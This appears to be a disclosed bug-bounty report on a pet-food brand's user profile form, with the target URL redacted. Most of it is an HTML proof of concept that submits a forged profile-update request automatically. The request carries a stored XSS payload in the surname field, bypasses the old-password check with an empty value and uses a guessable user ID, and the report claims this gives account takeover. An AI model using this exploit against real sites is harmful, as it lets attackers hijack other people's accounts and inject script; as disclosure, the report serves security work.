## Summary: Hi team, ## Steps To Reproduce: [add details for how we can reproduce the issue] This is my CSRF POC: <html>  <body> <form action="██████" method="POST" enctype="multipart/form-data"> <input type="hidden" name="nombre" value="aaaaaaaaaaaaaaaa" /> <input type="hidden" name="apellido" value="<script>alert()</script>" /> <input type="hidden" name="email" value="weqwad@intigriti.me" /> <input type="hidden" name="rut" value="" /> <input type="hidden" name="idProvincia" value="15" /> <input type="hidden" name="idLocalidad" value="0" /> <input type="hidden" name="optin[usuario_info_miroyalcanin]" value="no" /> <input type="hidden" name="optin[usuario_info_miroyalcanin]" value="si" /> <input type="hidden" name="optin[usuario_info_marspetcare]" value="no" /> <input type="hidden" name="optin[usuario_info_marspetcare]" value="si" /> <input type="hidden" name="optin[usuario_investigaciones]" value="no" /> <input type="hidden" name="optin[usuario_investigaciones]" value="si" /> <input type="hidden" name="optin[usuario_info_perros]" value="no" /> <input type="hidden" name="optin[usuario_info_perros]" value="si" /> <input type="hidden" name="optin[usuario_info_gatos]" value="no" /> <input type="hidden" name="optin[usuario_info_gatos]" value="si" /> <input type="hidden" name="switch_pass" value="off" /> <input type="hidden" name="ck_oldpass" value="" /> <input type="hidden" name="oldpass" value="" /> <input type="hidden" name="clave" value="" /> <input type="hidden" name="clave2" value="" /> <input type="hidden" name="idUsuario" value="91737" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ### The "oldpass" value can empty to bypass:)) ### The "idUsuario" value requirement can guess!!! ### impact: Account Takeover

Stored XSS + CSRF in "apellido" value

Vulnerability Details

Actions

Report Stats

Share this report